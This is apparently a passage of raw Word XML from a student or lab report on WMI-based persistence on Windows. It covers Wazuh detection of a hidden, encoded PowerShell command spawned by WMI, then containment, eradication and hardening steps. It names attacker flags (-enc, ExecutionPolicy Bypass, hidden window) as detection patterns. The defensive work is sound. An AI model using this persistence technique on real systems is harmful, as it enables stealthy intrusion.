          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc220896699"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>C) SIEM / Wazuh (main detection evidence from our demo)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="4DA3FCD3" w14:textId="13648233" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="6EFC9E73">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wazuh successfully detected this activity and generated an alert stating that a PowerShell process created by WMI executed a Base64-encoded command. This is strong evidence of WMI-based persistence because the execution is attributed to WMI rather than direct user actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1360E711" w14:textId="6D22915D" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="6EFC9E73">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The alert details show suspicious characteristics consistent with the persistence setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18903EEC" w14:textId="728630A0" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>powershell.exe executed from the Windows PowerShell path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DE23DE" w14:textId="5998F094" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-WindowStyle Hidden, -ExecutionPolicy Bypass, and -enc were present in the command line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7A275" w14:textId="40DA599F" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>The host running the activity was win11 (&lt;VICTIM_IP&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62578E" w14:textId="11C87FEE" w:rsidR="6EFC9E73" w:rsidRDefault="099E7C3F" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>The activity aligns with the expected behavior of CommandLineEventConsumer repeatedly executing the stored command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB8A560" w14:textId="598A7BD0" w:rsidR="6EFC9E73" w:rsidRDefault="099E7C3F" w:rsidP="099E7C3F">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This demonstrates that although WMI persistence is designed to evade traditional startup inspections, it remains detectable through proper endpoint logging and SIEM correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D80494" w14:textId="06E3AE10" w:rsidR="046CF4CD" w:rsidRDefault="7DE7A6D7" w:rsidP="046CF4CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D6D8A74" wp14:editId="35638706">
            <wp:extent cx="5829300" cy="1647825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79263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3448" name="Picture 79263448"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="1647825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0E1668" w14:textId="61DE90A3" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="4977A0C8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc220896700"/>
      <w:commentRangeStart w:id="45"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation </w:t>
      </w:r>
      <w:commentRangeEnd w:id="45"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="45"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Strategies (Containment, Eradication, Recovery)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="6FEE1A2A" w14:textId="6EB64FED" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="306EDB41">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Containment (stop execution quickly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC99A8" w14:textId="5536F712" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="22C91E89">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Temporarily isolate the host from the network if outbound callbacks are occurring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D8DC8" w14:textId="12373020" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="22C91E89">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Terminate suspicious PowerShell processes if they repeatedly spawn (temporary measure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A7C6A5" w14:textId="4396D79B" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="306EDB41">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc220896701"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Eradication (remove persistence properly)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="130FFAD5" w14:textId="024071D9" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="306EDB41">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>The main fix is deleting the malicious WMI subscription objects from root\subscription:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE40EF" w14:textId="6006AAC7" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="22C91E89">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Remove the malicious __EventFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D47776" w14:textId="214D80C0" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="22C91E89">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Remove the malicious CommandLineEventConsumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E5985F" w14:textId="55E32E7F" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="22C91E89">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Remove the related __FilterToConsumerBinding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41870D89" w14:textId="4ABF42BC" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="306EDB41">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>After removal,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6946D4" w14:textId="22F44C40" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="22C91E89">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Re-run WMI queries to confirm the objects no longer exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54576930" w14:textId="4FCA042E" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="22C91E89">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Observe the host for a few minutes to ensure PowerShell no longer auto-executes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C332610" w14:textId="5FC527E4" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="1232A88C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc220896702"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Recovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="2D9BFCB0" w14:textId="3EB3D76D" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="22C91E89">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Re-enable endpoint protections if disabled during testing (Defender, firewall policies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075B4544" w14:textId="4371A355" w:rsidR="22C91E89" w:rsidRDefault="22C91E89" w:rsidP="22C91E89">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Audit for additional persistence methods (attackers often layer persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3227E084" w14:textId="50A6E17C" w:rsidR="00B8236E" w:rsidRDefault="22C91E89" w:rsidP="1232A88C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Monitor logs for re-creation attempts of WMI subscription objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BEE07E" w14:textId="61B95BFE" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:after="299"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc220896703"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Security Control / Mitigation Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="4EA3CF47" w14:textId="26F17BA1" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>Enable strong logging coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55075B89" w14:textId="34437460" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>PowerShell Script Block Logging / Module Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC4622A" w14:textId="2BE04C97" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>WMI Activity Operational log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25554052" w14:textId="7F769C4D" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sysmon with WMI event IDs (19–21) for permanent subscription detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C34398" w14:textId="51257D9B" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="00B8236E" w:rsidP="1D0A83BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6280CC" w14:textId="037A8664" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>PowerShell hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C214E6E" w14:textId="4CD26D8B" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Constrained Language Mode (where suitable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F9FCBB" w14:textId="75E6D321" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Alert on suspicious flags like -enc, ExecutionPolicy Bypass, hidden window execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22923208" w14:textId="731657F4" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="00B8236E" w:rsidP="1D0A83BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B05C55" w14:textId="22175372" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>Application control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC70C39" w14:textId="5C3065A2" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>WDAC / AppLocker policies to restrict unauthorized PowerShell usage or encoded commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F0222F" w14:textId="75D8D8B2" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="00B8236E" w:rsidP="19873590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A3E993" w14:textId="5C0B2413" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>Least privilege enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9759DD" w14:textId="560C2D03" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Reduce local admin exposure; creation of WMI persistence is easier with elevated privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219513F" w14:textId="2CD8C5BB" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="00B8236E" w:rsidP="19873590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
